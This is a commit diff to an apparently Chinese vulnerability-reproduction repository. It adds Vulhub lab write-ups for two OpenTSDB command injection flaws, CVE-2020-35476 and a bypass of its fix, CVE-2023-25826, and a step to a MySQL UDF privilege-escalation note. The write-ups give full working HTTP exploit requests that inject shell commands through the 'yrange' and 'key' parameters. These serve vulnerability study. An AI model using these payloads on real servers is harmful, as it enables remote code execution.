Skip to content

Commit 263d632

Browse files
committed
update opentsdb cve-2020-35476 & cve-2023-25826
1 parent 7ad4a15 commit 263d632

19 files changed

Lines changed: 196 additions & 3 deletions

docs-base/docs/README.md

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,9 @@
1111

1212
**【最近更新】**
1313

14+
- 2024.03.07
15+
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-21351.md
16+
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-29505.md
1417
- 2024.02.26
1518
- Vulhub/Adobe-ColdFusion-XML-反序列化命令执行漏洞-CVE-2023-29300.md
1619
- Vulhub/Adobe-ColdFusion-本地文件包含漏洞-CVE-2023-26360.md
@@ -20,8 +23,6 @@
2023
- Vulhub/Jenkins-CLI-接口任意文件读取漏洞-CVE-2024-23897.md
2124
- Vulhub/Jetbrains-TeamCity-认证绕过导致远程命令执行漏洞-CVE-2023-42793.md
2225
- Vulhub/MeterSphere-v1.15.4-认证用户SQL注入漏洞-CVE-2021-45788.md
23-
24-
2526
- 2024.01.31
2627
- OA漏洞/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md
2728
- 开发框架漏洞/Apache-Commons-Configuration-远程命令执行漏洞-CVE-2022-33980.md

docs-base/docs/_sidebar.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -157,6 +157,8 @@
157157
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
158158
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
159159
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
160+
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
161+
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
160162
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
161163
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
162164
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)

docs-base/docs/appserver/MySQL-UDF提权.md

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,6 +18,12 @@ UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数
1818

1919
## 漏洞复现
2020

21+
查看 secure_file_priv:
22+
23+
```
24+
show variables like "secure_file_priv";
25+
```
26+
2127
寻找插件目录,将 UDF 的动态链接库文件放到 MySQL 的插件目录:
2228

2329
```
@@ -80,4 +86,3 @@ Query OK, 0 rows affected (0.00 sec)
8086
mysql> select * from func;
8187
Empty set (0.00 sec)
8288
```
83-
Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
# OpenTSDB 命令注入漏洞 CVE-2020-35476
2+
3+
## 漏洞描述
4+
5+
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。
6+
7+
参考链接:
8+
9+
- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051)
10+
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)
11+
12+
## 环境搭建
13+
14+
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0:
15+
16+
```
17+
docker compose up -d
18+
```
19+
20+
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。
21+
22+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png)
23+
24+
## 漏洞复现
25+
26+
利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表:
27+
28+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png)
29+
30+
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:
31+
32+
```
33+
POST /api/put/ HTTP/1.1
34+
Host: your-ip:4242
35+
Accept-Encoding: gzip, deflate
36+
Accept: */*
37+
Accept-Language: en
38+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
39+
Content-Type: application/x-www-form-urlencoded
40+
Connection: close
41+
Content-Length: 150
42+
43+
{
44+
"metric": "sys.cpu.nice",
45+
"timestamp": 1346846400,
46+
"value": 20,
47+
"tags": {
48+
"host": "web01",
49+
"dc": "lga"
50+
}
51+
}
52+
```
53+
54+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png)
55+
56+
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。再次查看 metric 列表,metric 已经创建完成:
57+
58+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png)
59+
60+
发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric:
61+
62+
```
63+
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
64+
Host: your-ip:4242
65+
Upgrade-Insecure-Requests: 1
66+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
67+
Accept-Encoding: gzip, deflate
68+
Accept: */*
69+
Accept-Language: en
70+
Connection: close
71+
```
72+
73+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png)
74+
75+
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:
76+
77+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png)
Lines changed: 104 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,104 @@
1+
# OpenTSDB 命令注入漏洞 CVE-2023-25826
2+
3+
## 漏洞描述
4+
5+
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。
6+
7+
参考链接:
8+
9+
- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/)
10+
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)
11+
12+
## 环境搭建
13+
14+
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1:
15+
16+
```
17+
docker-compose up -d
18+
```
19+
20+
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。
21+
22+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png)
23+
24+
## 漏洞复现
25+
26+
这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。
27+
28+
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:
29+
30+
```
31+
POST /api/put/ HTTP/1.1
32+
Host: your-ip:4242
33+
Accept-Encoding: gzip, deflate
34+
Accept: */*
35+
Accept-Language: en
36+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
37+
Content-Type: application/x-www-form-urlencoded
38+
Connection: close
39+
Content-Length: 150
40+
41+
{
42+
"metric": "sys.cpu.nice",
43+
"timestamp": 972388800,
44+
"value": 20,
45+
"tags": {
46+
"host": "web01",
47+
"dc": "lga"
48+
}
49+
}
50+
```
51+
52+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png)
53+
54+
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。
55+
56+
发送 CVE-2020-35476 payload :
57+
58+
```
59+
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
60+
Host: your-ip:4242
61+
Upgrade-Insecure-Requests: 1
62+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
63+
Accept-Encoding: gzip, deflate
64+
Accept: */*
65+
Accept-Language: en
66+
Connection: close
67+
```
68+
69+
将返回错误:
70+
71+
```
72+
{"err":"'yrange' was invalid. Must be in the format [min:max]."}
73+
```
74+
75+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png)
76+
77+
CVE-2023-25826 绕过修复的一个点,在参数 key 这里:
78+
79+
```shell
80+
# CVE-2020-35476
81+
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
82+
83+
# CVE-2023-25826
84+
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
85+
```
86+
87+
发送数据包:
88+
89+
```
90+
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
91+
Host: your-ip:4242
92+
Upgrade-Insecure-Requests: 1
93+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
94+
Accept-Encoding: gzip, deflate
95+
Accept: */*
96+
Accept-Language: en
97+
Connection: close
98+
```
99+
100+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png)
101+
102+
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:
103+
104+
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png)

docs-base/docs/vulhub/README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -158,6 +158,8 @@
158158
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
159159
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
160160
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
161+
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
162+
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
161163
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
162164
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
163165
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)

docs-base/docs/vulhub/_sidebar.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -157,6 +157,8 @@
157157
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
158158
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
159159
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
160+
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
161+
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
160162
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
161163
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
162164
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
165 KB
Loading
45.5 KB
Loading
121 KB
Loading

0 commit comments

Comments
 (0)